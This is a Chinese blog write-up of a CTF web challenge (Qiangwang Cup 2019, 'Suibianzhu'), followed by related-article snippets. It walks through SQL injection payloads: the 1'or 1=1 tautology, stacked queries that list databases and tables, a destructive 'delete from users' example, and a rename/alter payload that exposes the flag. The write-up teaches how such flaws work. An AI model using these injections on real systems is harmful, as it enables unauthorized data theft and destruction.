BUUCTF-强网杯2019随便注 write up(笔记系列)

已于 2022-04-04 21:29:47 修改
阅读量1.6k 收藏 4
点赞数 5
文章标签: web 经验分享 网络安全
于 2022-04-03 21:10:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62851980/article/details/123942292
版权

打开靶机,输入万能密码1'or 1=1;来查看所有内容:

万能密码原理:

万能密码能够绕过sql检测,在sql数据库中,运算符也是有优先级的,=优先于and,and优先于or,简单来说1=‘1’恒成立,因此返回值永远为True,且在SQL语法中 # 是注释符,所以后面的语句都会被注释掉。

通过万能密码我们看到所有回显,以及所有信息,不过这样我们无法提取有用信息,所以下面我们输入1'; union seclect 1,2;#回显一个正则过滤规则:

回显的正则过滤规则:

1' ;union seclect 1,2;#来得到,其中回显的函数全都是被过滤掉的,我们由此可以知道哪些函数没有用,这里的被过滤函数出现了select,select被过滤意味着这道题无法联合(union)注入

拓展:preg_match:PHP正则表达式preg_match函数的使用:
利用 preg_match(),可以完成字符串的规则匹配。如果找到一个匹配,preg_match() 函数返回 1,否则返回 0。

 所以为了解题,我们采用堆叠注入

堆叠注入是什么呢:

在sql中,分号(;)表示一条语句的结束。如果在分号的后面再加一条语句,这条语句也可以被执行,继续加一个分号和一条语句,这样就可以在一次数据库的调用中执行多个语句。

 比如我们要进行user的信息查询,之后全部删除他的信息,就能用user注入:

select * from users where id =1;delete from users;

第一句查询user的信息,                         第二句删除user的信息

了解堆叠注入后,回归本题,我们利用堆叠注入来查询一下所有的库名:

1'; show databases;#    -->show是一个指令

 

 以上就是所有的库名啦,接下来我们继续查表名:

1';show tables;#

 从这里我们能看到一共有两个表:words,1919810931114514

表里面会有什么信息呢,我们继续用1';desc `表名`;#或者1'; show columns from `表名`;#来读取一下:

desc用于查看表的结构   show columns显示表的列信息。

 这里注意一下,表名要用反引号`括起来,在mysql中,windows下要区分单引号''和反引号``,(linux下不区分):

单引号主要用于字符串的引用,反引号主要用于数据库,表,索引,列,别名

可以在数字表中看到flag,而看了上面的回显,“nonono”,以及上面的代码,应是words给的回显,因为数字表只有一个字段放flag,也就是说,我们查询的窗口内容都是words回显,那么我们只需让数字表回显出来flag就行了。

已知内部查询语句:select id,data from word where id =

(select 语句:select语句用来检索数据表中的数据,而哪些数据被检索由列出的数据行与语句中的where子句决定)

那么我们使用堆叠查询,rename和alter都没有被过滤,所以可以通过更改表名和列名的操作获得flag。

拓展:在sql中,rename和change都是用于修改名称的

rename修改的是表名称,而change修改的是表中的字段名称。

在MySQL中,rename table 和alter table语句来重命名表,(不能使用rename table 语句重命名一个临时表,但可以使用 alter table 语句来重命名一个临时表)修改表名:

rename table old_table_name to new_table_name;

1.先对words进行改表名防止重名:rename table `words` to `word`;

2.将数字表改为words表名(在窗口回显内容):rename table `1919810931114514` to `words`;

3.我们查表结构时看到words里有两个字段id列和数据data,但数字表没有id,所以我们把flag换成id:alter table `words` change `flag` `id` varchar(100);#  或者给他也添加上一个id列:alter table `words` add id int(10);(这里的words是修改过的数字表)

-->如果修改flag为id直接堆叠:

1';rename table `words` to `word`;rename table `1919810931114514` to `words`;alter table `words` change `flag` `id` varchar(100);#

-->如果选择添加一个id列选择以下步骤:(4.给数字表(已经换表名为words)alert table words change flag data varchar(20); # 把字段名flag改成data(令数字表与先前的words字段保持一致))

堆叠一下:1';rename table `words` to `word`;rename table `1919810931114514` to `words`;alter table `words` add id int(10);alter table `words` change flag data varchar(20);#

最后再用万能密码输入就能回显出来flag :

 我的天,这题真的看了好多好多知识点,跟打笔记一样,,如果有大佬看到有不妥之处请务必指出,也欢迎找俺讨论

今天不用学物理吧
关注
  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
java版sm4源码-SCTF2019-Write-Up:SCTF2019报道
06-04
Write-Up Misc 签到 出题人: XXX 解题人数: 260 最终分数:71 [removed]/9j/4QBkRXhpZgAATU0AKgAAAAgABYdp... 给了个图片的base64编码,某些浏览器可能渲染会截断,本来想放hint提示浏览器问题,但是直接被秒了就没...
PICOCTF_2019:picoCTF2019解决方案
02-18
【标签】:“binary-exploitation write-up picoctf-2019 C” 这些标签揭示了压缩包中的主要内容和技术方向。"binary-exploitation"表明了解题过程中涉及了二进制漏洞利用,这是CTF比赛中常见的一类挑战,通常需要...
防止sql语句编写入攻击
pan_xi_yi的博客
10-20 633
通常简单的有直接在登陆处写用户名为 ‘ or 1=1 #来登陆,密码随便填写,如果没有防范,就直接登陆了,防止方法,两个函数, 一、addslashes(string)string 必须,规定要转义的字符串 addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。 预定义字符是: 单引号(’) 双引号(”) 反斜杠(\) NULL 该函数可用于为存储在数据库中的字符串以
ctfshow刷题记录2(web crypto misc)
aarong的博客
12-19 449
简单记录一下自己做题的过程,方便以后进行复习 WEB、Crypto、MISC都涉及一些(入门级别,不是很难,希望得到师傅们的建议) 主要是多做题获得到解题的思路和经验 目录WEB1WEB2WEB3WEB4crypto2crypto3crypto4crypto5crypto6MISC2MISCx WEB1 F12查看网页信息 base64解码 WEB2 考察:SQL手工入 必要知识点:在Mysql5.0以上版本中,Mysql存在一个自带数据库名为information_schema,它是一个存储记录所有
浅析JSP入侵中的SQL入之1'or'1'='1
weixin_30909575的博客
12-06 459
浅析JSP入侵中的SQL入之1'or'1'='1 http://www.176ku.com/wenzhai/ruqin/200905/10630.html 作者:佚名文章来源:网络点击数: 133更新时间:2009-5-24 BY:黑色之恋 【B.H.S.T】浅析JSP入侵中的SQL入之1'or'1'='1我们在入侵ASP站的时候,会遇到很多由于代码过...
BUUCTF刷题记录】[强网杯 2019]随便
m0_60911102的博客
09-17 365
随便
2019强网杯write up(难度较大)-b64_c3VuJTIwYm95-it720.doc
11-29
2019强网杯】是一场网络安全领域的竞赛,主要涉及CTF(Capture The Flag)类型的挑战。参赛者需要解决一系列的安全问题,包括代码审计和PHP反序列化等技术。这次比赛的题目难度较大,提供了多个下载链接,如GitHub...
CTF-Write-up:CTF撰写和信息
03-21
在CTF-Write-up-main这个压缩包中,可能包含了多个CTF Write-up文档,每个文档都详细记录了一个或多个挑战的解题过程。这些文档可以作为学习资料,帮助初学者了解不同类型的CTF挑战,熟悉解题流程,并且学习如何分析...
libmodbus-3.1.4-vs2019-x64
最新发布
06-15
《libmodbus-3.1.4-vs2019-x64:构建与Qt集成的MODBUS TCP通信库》 libmodbus是开源的、跨平台的MODBUS协议实现库,它允许用户通过TCP/IP或者串行接口进行MODBUS通信。在本项目“libmodbus-3.1.4-vs2019-x64”中,...
[强网杯 2019]随便
m0_56691564的博客
11-30 2661
该题作者在页面就查了这两个字段的内容,由于该题禁用select,因此我们可以用作者原本设定的查表函数来帮我们查我们想要查找的内容。用rename把words表改名为其他的表名,把 1919810931114514表的名字改为words,给words表添加新的列名id,将flag改名为data。大意应该是过滤了select,绕过一下,好的发现绕过不了,不管是编码还是释都不行,因此这个题使用堆叠入。由show的作用可知,words表内就两个字段,一个叫id,一个叫data。
BUUCTF Web [强网杯 2019]随便
wangyuxiang946的博客
10-25 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [强网杯 2019]随便一、题目简介二、思路分析1)判断入点2)选择入方式3)查看表中内容三、解题步骤1)获取表2)获取字段3)获取表中数据四、总结 一、题目简介 进入题目链接后,是一个「查询」功能,在输入框中提交id,即可返回「响应」的内容。 在输入框中输入一个2,即可.
万能密码:‘or 1=1-- 实战SQL入,秒破后台
杨明金的博客
10-24 3万+
主要是没有对登录密码的字符串进行参数化和过滤,所以导致网站可以直接用“万能密码”进行突破登录 仅供学习交流 这是某同学做的网站,今天无聊打开了,并帮他进行测试一下 看到这个后台,感觉做的还是不错的,首先SQL入一般这种“万能密码”在99%的网站都是没有用的了,因为几乎所有发布到网络上的网站都是有进行安全考虑的,像这种学生的学术作品的话,一般不会考虑那么多,所以直接使用万能密码进行登录后台 万能密码:'or 1=1-- 用户名随便输入,密码填写这个,输入验证码,ok,大功告成 直接就.
SQL万能密码:' or 1='1
热门推荐
friendan的专栏
08-15 6万+
select name,pass from tbAdmin where name='admin' and pass='123456' 输入用户名:' or 1='1 SQL变成下面这个样子: select name,pass from tbAdmin where name='' or 1='1' and pass='123456' 1='1' 永远为真,所以
BUUCTF笔记Web系列部分WriteUp(一)
克格莫
04-29 919
1、[极客大挑战 2019]EasySQL
[SQL入][强网杯 2019]随便(三种姿势)
Y4tacker的博客
08-05 8104
文章目录姿势一 ---- 常规堆叠入姿势二---预处理语句姿势三 --- handeler参考文章 前言: 1919810931114514必须用反单引号括起来,但是words不需要,应该是和数据类型有关 姿势一 ---- 常规堆叠入 堆叠入为攻击者提供了很多控制权,与仅限于SELECT语句的UNION联合查询攻击不同,堆叠入可以用于执行任何SQL语句。 首先老规矩输入1 加个单引号,报错 释掉后面大概猜到表的结构了selsect id,data from words where id =,并
BUUCTF-MD5强弱比较-MD5()的万能密码-tornado框架入-中文电码
m0_64180167的博客
04-09 860
第六周 第三次。
buuctf [强网杯 2019]随便 1
weixin_45642610的博客
01-07 1万+
buuctf web [强网杯 2019]随便 1 -刷题个人日记 小白一个,写给自己看。 打开后是这样。 从题目和内容来看就是一道sql入题。 输入 1' or 1=1;# 这个#用来释掉后面的sql语句 显示所有数据,这个数据有什么用我也不知道,但sql入一般第一步就是这样看看有没有有用的信息(没有)。 输入 1' order by 2;# 1' order by 3;# 到第3列报错,说明只显示两列。 输入1'; show tables;# 可以看到有 191981093

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值